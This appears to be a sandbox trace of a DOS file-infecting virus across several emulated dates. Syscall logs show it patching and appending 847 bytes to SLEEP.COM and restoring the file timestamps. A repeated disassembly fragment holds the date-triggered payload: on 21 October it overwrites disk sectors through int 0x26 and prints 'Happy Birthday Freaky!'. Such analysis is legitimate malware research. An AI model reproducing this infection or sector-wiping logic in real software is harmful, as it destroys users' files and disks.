2018-12-25T11:52:35.737008798Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.739823429Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.745464784Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.751267377Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.767011026Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.773295409Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.775095863Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.781294923Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.782194967Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.784376508Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.78575611Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.793957378Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.796679691Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.801274366Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.809643225Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.816213081Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.82279529Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.825720882Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.831662315Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.842048914Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.853184454Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.85468681Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.870564595Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.872494698Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.875261466Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.877970692Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.886121608Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.887533914Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.8928267Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.900794172Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.906455818Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.91337947Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.916263609Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.926581819Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.938852803Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.947706869Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.949081669Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.954182097Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.955358343Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.957151066Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.958452593Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.963887883Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.965031961Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.968128042Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.973758092Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.977435465Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.981213843Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.983482096Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.990198085Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.997990267Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.005678868Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.006962228Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.013519038Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.018663085Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.021085865Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.022343839Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.030713928Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.03191457Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.034844944Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.040115573Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.045597178Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.050987071Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.05385253Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.063731209Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.075159869Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.083106145Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.084516484Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.090702553Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.09238026Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.094867982Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.096102591Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.104170775Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.105507521Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.109955844Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.1177185Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.123447151Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.129093927Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.140020182Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.146243482Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:36.147822871Z 42 PC: 12c84 | Get date
0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21
2018-12-25T11:52:36.150799299Z 9 PC: 12cb4 | Display string (String= 'Happy Birthday Freaky!')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.810381674Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.812069386Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.815174752Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.821947128Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.828412517Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.845412932Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.858199288Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.85968839Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.867587025Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.869127408Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.872025542Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.874108756Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.886015038Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.887552048Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.893095252Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.901303625Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.907818415Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.920491721Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.922454653Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.926756501Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.934263887Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.941579624Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.943120911Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.950938443Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.961439844Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.964642827Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.966539293Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.975786694Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.977306857Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.982457577Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.991448281Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.998847948Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.005535349Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.008922435Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.014991561Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.026005021Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.033880189Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.035430642Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.042534809Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.044837619Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.048619956Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.050614132Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.060319318Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.061913481Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.06762101Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.076317868Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.083589179Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.08997807Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.0927065Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.099551262Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.110376373Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.122981877Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.125444305Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.130113323Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.131205966Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.134620821Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.135905305Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.141231071Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.143716308Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.147189103Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.156305687Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.163897718Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.170275993Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.172939498Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.184606389Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.198136004Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.205056776Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.206448433Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.213459729Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.214880633Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.217627212Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.219830452Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.228207803Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.230882923Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.23649409Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.244783001Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.250977115Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.263461285Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.26729958Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.271179801Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:36.272600898Z 42 PC: 12c84 | Get date
0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:36.811998075Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:36.814081003Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:36.817209584Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:36.822960789Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:36.833728848Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:37.164112249Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:37.170630498Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:37.172344123Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:37.179385231Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:37.181025641Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:37.183873536Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:37.186427144Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:37.19563242Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:37.197101873Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:37.202898128Z 62 PC: 12c21 | Close file
2018-12-25T11:52:37.210553296Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:37.216511957Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:37.228761206Z 79 PC: 12bab | Find next file
2018-12-25T11:52:37.231553979Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.23748499Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.247656157Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.254112597Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.255504513Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.266381751Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.267697834Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.270213579Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.272910002Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.280826382Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.282670856Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.287614898Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.300099614Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.306266245Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.312824178Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:37.315553634Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.321405021Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.33145887Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.343030446Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.344751559Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.351443393Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.353461458Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.356182633Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.358278228Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.36704948Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.368478191Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.3744557Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.382855441Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.389203089Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.394887802Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:37.398111627Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.408831065Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.422482681Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.430394755Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.432413306Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.438636203Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.440790972Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.443192024Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.444872854Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.453428781Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.45526682Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.459959323Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.472047887Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.478773906Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.490334536Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:37.493055659Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.498733063Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.508430105Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.51515859Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.517019207Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.52323733Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.524658866Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.527510542Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.528897088Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.536762283Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.538686785Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.543152619Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.550538986Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.55739188Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.562920429Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.568473983Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.574294732Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:37.575779754Z 42 PC: 12c84 | Get date
0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21